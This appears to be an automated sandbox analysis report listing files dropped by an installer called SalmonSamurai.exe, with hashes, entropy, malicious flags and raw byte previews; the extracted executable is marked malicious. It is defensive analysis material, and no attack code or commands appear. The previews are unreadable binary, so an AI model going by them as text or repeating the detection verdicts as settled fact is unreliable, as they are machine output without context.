                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wkfkxb0m.yhk.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wmqisc2n.3rb.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xvk2yp1w.uzu.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xzxch2b5.u53.ps1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yssi4wwf.kvq.psm1

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\nspC7A4.tmp

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 33554432.000000, slope 35184388866048.000000
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):246294845
                                                                                                                                                                                                                                              Entropy (8bit):6.95746554896744
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1572864:KLBZB52nvuZ7wVuMbgR7Sp6kYdEctmhoLsPagBsgkx52HYhwj+vfIBUdoJnP9Dj3:KypCmJctBjj2+JvFg+E2XdWU1Qt3
                                                                                                                                                                                                                                              MD5:42259B63C8D2B564557504B587E86073
                                                                                                                                                                                                                                              SHA1:E0B53769C0E3B0F296C9C94AC37F81800145A46B
                                                                                                                                                                                                                                              SHA-256:36485E67930FFF7A6F7E0E3156FD01817FEE62116B5E7E5257C4F2BC057CD779
                                                                                                                                                                                                                                              SHA-512:DB22AC07FB203B5009DA15D360A7F555FFD50D66C933F40E148B47FA5A986D976ACF11888D1FF2F31DB025FB94B1DE01C506F06EC142BB0A5707ED02E1C63647
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:H&......,...............................2%.......&..........................................................................4...............................................................................................................................................................G...J...........B...g.......................[.......................................j.......................[...................................................................................................................5...O.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\LICENSE.electron.txt

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1096
                                                                                                                                                                                                                                              Entropy (8bit):5.13006727705212
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:36DiJHxRHuyPP3GtIHw1Gg9QH+sUW8Ok4F+d1o36qjFD:36DiJzfPvGt7ICQH+sfIte36AFD
                                                                                                                                                                                                                                              MD5:4D42118D35941E0F664DDDBD83F633C5
                                                                                                                                                                                                                                              SHA1:2B21EC5F20FE961D15F2B58EFB1368E66D202E5C
                                                                                                                                                                                                                                              SHA-256:5154E165BD6C2CC0CFBCD8916498C7ABAB0497923BAFCD5CB07673FE8480087D
                                                                                                                                                                                                                                              SHA-512:3FFBBA2E4CD689F362378F6B0F6060571F57E228D3755BDD308283BE6CBBEF8C2E84BEB5FCF73E0C3C81CD944D01EE3FCF141733C4D8B3B0162E543E0B9F3E63
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:Copyright (c) Electron contributors.Copyright (c) 2013-2020 GitHub Inc...Permission is hereby granted, free of charge, to any person obtaining.a copy of this software and associated documentation files (the."Software"), to deal in the Software without restriction, including.without limitation the rights to use, copy, modify, merge, publish,.distribute, sublicense, and/or sell copies of the Software, and to.permit persons to whom the Software is furnished to do so, subject to.the following conditions:..The above copyright notice and this permission notice shall be.included in all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,.EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF.MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND.NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE.LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION.OF CONTRACT, TORT OR OTHERWISE, ARISIN

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\LICENSES.chromium.html

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):8312662
                                                                                                                                                                                                                                              Entropy (8bit):4.705814170451806
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24576:dbTy6TU675kfWScRQfJw91SmfJB6i6e6R626X8HHdE/pG6:tygpj
                                                                                                                                                                                                                                              MD5:312446EDF757F7E92AAD311F625CEF2A
                                                                                                                                                                                                                                              SHA1:91102D30D5ABCFA7B6EC732E3682FB9C77279BA3
                                                                                                                                                                                                                                              SHA-256:C2656201AC86438D062673771E33E44D6D5E97670C3160E0DE1CB0BD5FBBAE9B
                                                                                                                                                                                                                                              SHA-512:DCE01F2448A49A0E6F08BBDE6570F76A87DCC81179BB51D5E2642AD033EE81AE3996800363826A65485AB79085572BBACE51409AE7102ED1A12DF65018676333
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview: Generated by licenses.py; do not edit. --><!doctype html>.<html>.<head>.<meta charset="utf-8">.<meta name="viewport" content="width=device-width">.<meta name="color-scheme" content="light dark">.<title>Credits</title>.<link rel="stylesheet" href="chrome://resources/css/text_defaults.css">.<link rel="stylesheet" href="chrome://credits/credits.css">.</head>.<body>.<span class="page-title" style="float:left;">Credits</span>.<a id="print-link" href="#" style="float:right;" hidden>Print</a>.<div style="clear:both; overflow:auto;"> Chromium <3s the following projects -->.<div class="product">.<span class="title">2-dim General Purpose FFT (Fast Fourier/Cosine/Sine Transform) Package</span>.<span class="homepage"><a href="http://www.kurims.kyoto-u.ac.jp/~ooura/fft.html">homepage</a></span>.<input type="checkbox" hidden id="0">.<label class="show" for="0" tabindex="0"></label>.<div class="licence">.<pre>Copyright(C) 1997,2001 Takuya OOURA (email: ooura@kurims.kyoto-u.ac.jp)..You may us

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):160143360
                                                                                                                                                                                                                                              Entropy (8bit):6.741790865491727
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1572864:mLBZB52nvuZ7wVuMbgR7Sp6kYdEctmhoLsPagBsgkx52HYhwj+vfIBUdoJnP9Dj0:mypCmJctBjj2+Jv
                                                                                                                                                                                                                                              MD5:6EA18AE76085155E2681CCA92745A9AF
                                                                                                                                                                                                                                              SHA1:9EAC8A0CED4B353D3E1B17A3D844255FDCC14667
                                                                                                                                                                                                                                              SHA-256:40ABBA1E7DA7B3EAAD08A6E3BE381A9FC2AB01B59638912029BC9A4AA1E0C7A7
                                                                                                                                                                                                                                              SHA-512:757B1CA6D1BD47DE3CDAA5343E115CC4F35078FF450E99AD6DA879F7614E35D57600997D2F830777E965F901C6A61BB7888700B7547730B5C4C4C5F7A44603B0
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........."......0...8.......F.........@..........................................`...........................................+.. ..0"..h.......`....Pt.._@..........0.......!.......................!.(... Q..@...........@8......`.*......................text...:/.......0.................. ..`.rdata..h.n..@....n..4..............@..@.data....TB...1.......1.............@....pdata..._@..Pt..`@...9.............@..@.00cfg..0.............z.............@..@.gxfg...pA.......B....z.............@..@.retplne.............Dz..................rodata...... .......Fz............. ..`.tls.........@.......Xz.............@...CPADinfo8....P.......\z.............@...LZMADEC......`.......^z............. ..`_RDATA..\............pz.............@..@malloc_h+............rz............. ..`.rsrc...`............xz.............@..@.reloc......0........|.............@..B................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\chrome_100_percent.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):127125
                                                                                                                                                                                                                                              Entropy (8bit):7.915612661029362
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:vlKzwqCT4wDNzIwL2o418Gb0+VRLf0ld0GY3cQ39Vm2I:vlKzwt4uEgK18Gb0OV8ld0GecQ3f2
                                                                                                                                                                                                                                              MD5:ACD0FA0A90B43CD1C87A55A991B4FAC3
                                                                                                                                                                                                                                              SHA1:17B84E8D24DA12501105B87452F86BFA5F9B1B3C
                                                                                                                                                                                                                                              SHA-256:CCBCA246B9A93FA8D4F01A01345E7537511C590E4A8EFD5777B1596D10923B4B
                                                                                                                                                                                                                                              SHA-512:3E4C4F31C6C7950D5B886F6A8768077331A8F880D70B905CF7F35F74BE204C63200FF4A88FA236ABCCC72EC0FC102C14F50DD277A30F814F35ADFE5A7AE3B774
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:..............t...#.....:.I...J~p...K~6...L~....M~#...N~....O~`...P~m...Q~....R~....S~I...T~....U~'"..V~.,..^~.7.._~;9..b~v:..c~(<..j~.<..k~.B..l~fH..m~.J..n~.K..o~.L.....M.....N....aP....IS....BV....uY.....]....Pa.....d....h....i...hk....l....m...An....n.....................................K.....x...........4.....m.....D.............................1........................'.....*.....4.....>.....C.....D....hM.....U.....V....>X.....Z....E].....]....a...%c....d....f....h....i....k....l....o...wq....t...7v....y....}....~...m................................3.................g.....6............................k.....-...........3.....9......................H.......................Y.................{.....s....M..............F...................&....y..............\....p....Z.........Z.........g...........................T..................6...............M.................r...........1.................X.................u.......

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\chrome_200_percent.pak

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):177406
                                                                                                                                                                                                                                              Entropy (8bit):7.939611912805236
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:4DQYaEQN6AJPKNzIwafR54x5GMR+F44ffbdZnYw9p4AbIVGYoDd+HxNK/rIM0:4DQYaNN68QEVgx5GMRejnbdZnVE6YopY
                                                                                                                                                                                                                                              MD5:4610337E3332B7E65B73A6EA738B47DF
                                                                                                                                                                                                                                              SHA1:8D824C9CF0A84AB902E8069A4DE9BF6C1A9AAF3B
                                                                                                                                                                                                                                              SHA-256:C91ABF556E55C29D1EA9F560BB17CC3489CB67A5D0C7A22B58485F5F2FBCF25C
                                                                                                                                                                                                                                              SHA-512:039B50284D28DCD447E0A486A099FA99914D29B543093CCCDA77BBEFDD61F7B7F05BB84B2708AE128C5F2D0C0AB19046D08796D1B5A1CFF395A0689AB25CCB51
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:..............t...#.....:.t...J~....K~....L~....M~....N~....O~....P~.%..Q~.*..R~.-..S~c5..T~.9..U~.A..V~.V..^~Ck.._~.m..b~)o..c~yr..j~#s..k~.}..l~....m~...n~...o~......................................K.....!..................Q..............*........................a.......................,%....H0.....2....E:....(A.....F.....L.....R.....T....QY....:].....f.....i....br....Sv..........C...........).................].....}................................................................................................. ....!....%.....*.....,..........O/...../....y1.....2....l4.....6.....7....A:.....?.....C.....K.....S.....Y....._.....e....Ok.....l.....m.....n.....o.....q.....r.....s.....u....:w..............P............................%.............7................,........G........u.............B........S.........a....%........;.....................l...........T..........R...........6..........).............

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4916712
                                                                                                                                                                                                                                              Entropy (8bit):6.398049523846958
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:KCZnRO4XyM53Rkq4ypQqdoRpmruVNYvkaRwvhiD0N+YEzI4og/RfzHLeHTRhFRNc:xG2QCwmHPnog/pzHAo/A6l
                                                                                                                                                                                                                                              MD5:2191E768CC2E19009DAD20DC999135A3
                                                                                                                                                                                                                                              SHA1:F49A46BA0E954E657AAED1C9019A53D194272B6A
                                                                                                                                                                                                                                              SHA-256:7353F25DC5CF84D09894E3E0461CEF0E56799ADBC617FCE37620CA67240B547D
                                                                                                                                                                                                                                              SHA-512:5ADCB00162F284C16EC78016D301FC11559DD0A781FFBEFF822DB22EFBED168B11D7E5586EA82388E9503B0C7D3740CF2A08E243877F5319202491C8A641C970
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                              • Filename: NativeApp_G5L1NHZZ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: AyqwnIUrcz.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: nanophanotool.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: 9VbeqQbgU4.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: 9VbeqQbgU4.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: ivySCI-5.6.3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: ivySCI-5.6.3.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: MayitaV16.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........|3..]...]...]..e\...]...\.5.]..e...]..wX...]..wY...]..e^...]..eX.y.]..eY...]..e]...]..eU./.]..e....]..e_...].Rich..].................PE..d...^.}`.........." ......8..........<).......................................K.....:FK...`A........................................`%G.x....(G.P.....J.@.....H.......J..%....J.....p.D.p....................S<.(...pR<.@............S<.(............................text.....8.......8................. ..`.rdata...F....8..P....8.............@..@.data...`....@G......@G.............@....pdata........H......@H.............@..@.rsrc...@.....J......@J.............@..@.reloc........J......PJ.............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\ffmpeg.dll

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2883072
                                                                                                                                                                                                                                              Entropy (8bit):6.697367886822868
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:YGJO72cNsdMZWfAn1fdmZMOqcQrGhjUHgNxGUwSCmmfYDJGz5SN3lzl3hSKqH:Jj8n1QqGCmmfIUz59t
                                                                                                                                                                                                                                              MD5:E096C168B79A56DED0DF1AA142D9F1DA
                                                                                                                                                                                                                                              SHA1:318F20DAB294A315BD935160E9417FB5B28300F5
                                                                                                                                                                                                                                              SHA-256:65CC75329D17EC264E7A2DB571EA55F918394241445EA64569A56C75D0CFDC60
                                                                                                                                                                                                                                              SHA-512:3DCCF6CE85EF7E75690A5851642F10BB5E6E1572E91E933BACB7FCBFE405B0412B94BA0E160C3BA8D68D2B9AFC1DA268F61C83DCCD6453D8C9470931EE900BFD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." .....$#..................................................@B...........`A..........................................*.......*.(.............@...............B..3....).......................).(....R#.@............"*.P............................text....##......$#................. ..`.rdata..l....@#......(#.............@..@.data...x.....*.."....*.............@....pdata........@.......*.............@..@.00cfg..8.....A.......+.............@..@.gxfg....,....A.......+.............@..@.retplne......A.......+..................tls..........A.......+.............@..._RDATA..\.....A.......+.............@..@.reloc...3....B..4....+.............@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\icudtl.dat

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):10542048
                                                                                                                                                                                                                                              Entropy (8bit):6.277141340322909
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:98304:OKPBQYOo+ddlymOk25flQCUliXUxiG9Ha93Whla6ZGdnp/8k:OKPBhORjOhCliXUxiG9Ha93Whla6ZGrn
                                                                                                                                                                                                                                              MD5:D89CE8C00659D8E5D408C696EE087CE3
                                                                                                                                                                                                                                              SHA1:49FC8109960BE3BB32C06C3D1256CB66DDED19A8
                                                                                                                                                                                                                                              SHA-256:9DFBE0DAD5C7021CFE8DF7F52458C422CBC5BE9E16FF33EC90665BB1E3F182DE
                                                                                                                                                                                                                                              SHA-512:DB097CE3EB9E132D0444DF79B167A7DCB2DF31EFFBBD3DF72DA3D24AE2230CC5213C6DF5E575985A9918FBD0A6576E335B6EBC12B6258BC93FA205399DE64C37
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:...'........CmnD........ Copyright (C) 2016 and later: Unicode, Inc. and others. License & terms of use: http://www.unicode.org/copyright.html .Q....B.......B...#...B.. $...B..p$...B...$...B...%...B..`P...C...P...C...Q..(C......<C.....OC......bC..@...uC.......C..P....C.......C.......C..p....C.. ....C.......C.......D..p... D.....3D..0...FD.....YD.....lD.......D......D..0....D.......D..p....D......D..@....D.......E......E..@...*E.....=E..P...NE......bE.....rE..@....E.......E.......E..P....E.......E......E..@....F.......F.....'F..0...7F..P...JF......aF......qF...G...F.. H...F..`K...F...K...F...L...F...-...F...c...G....'.'G....'.>G..@.'.UG..0.'.oG....'..G...!'..G...!'..G..P&'..G...)'..G..@*'..H..`.(..H...e).7H..0.).VH...)*.xH....*..H....*..H...P+..H...Y+..H...Z+..I...]+. I..`^+.9I.. .+.UI....+.lI....+..I..P.-..I...=...I.......I.......I.. ....J..p....J......-J..p...EJ......ZJ......rJ..`....J..@....J.......J.......J..0....J.......J.......J..0....K..@....K..../.2K...,/.GK..../.\K..

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\libEGL.dll

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):481280
                                                                                                                                                                                                                                              Entropy (8bit):6.330677392522242
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:F9L2FFtoVsruIzUEzUST6uHKw+BubaOQ74PlqF8:F9CGafznzUSTRY70I
                                                                                                                                                                                                                                              MD5:1EECFB04C4434F5A813C8F0C0C8F2C88
                                                                                                                                                                                                                                              SHA1:6DC3CA4B3F72E7FB33BA26FA488DE323EDB59ADD
                                                                                                                                                                                                                                              SHA-256:897CEB95FB164640DDD2426673997B5F6FC2619FD916B038B575A70A0682A706
                                                                                                                                                                                                                                              SHA-512:D7818A42A76508AC3150AEA8D4E168B2DB36F55F71983A177002086380A82E307624CFE37B01FFC3D7EB407485D182654D0D7C6A0C06CCAAE60666630469C7E0
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...)<#d.........." .....$................................................................`A........................................00......F>..(.......x.... ...C..............0....(.......................'..(...@A..@...........pA...............................text....".......$.................. ..`.rdata.......@.......(..............@..@.data....L....... ..................@....pdata...C... ...D..................@..@.00cfg..8....p......................@..@.gxfg...`$.......&..................@..@.retplne.............>...................tls....!............@..............@..._RDATA..\............B..............@..@.rsrc...x............D..............@..@.reloc..0............J..............@..B................................................................................................................................................................................

                                                                                                                                                                                                                                              C:\Users\user\AppData\Roaming\NsisExtracted\libGLESv2.dll

                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\SalmonSamurai.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):7625728
                                                                                                                                                                                                                                              Entropy (8bit):6.463180789552528
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:98304:U8qvGdDtslh+LD3ZDWfnSvBSDU5bPm3k89Ld3gsOMt/:JD3ZXJ7bPWLWsD/
                                                                                                                                                                                                                                              MD5:CBA2436016F7A2838588A52D5B6F30F1
                                                                                                                                                                                                                                              SHA1:81DDF44B3E122DFBEE1A2CD8D4544364F1A621A4
                                                                                                                                                                                                                                              SHA-256:BCB3A3D2FCA3C33FA3D1D5DC976AA913CDC8001DF8E64C2CD3D2C545245141BF
                                                                                                                                                                                                                                              SHA-512:D92A880B5F83C5AE10AE9A83E38A293BB0E8C7659DD6ECE162FC752D57C9FCDE8036B81B023CD9F0F4F32B95B06FD4C366E20301010354B6CB904398A3149A44
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
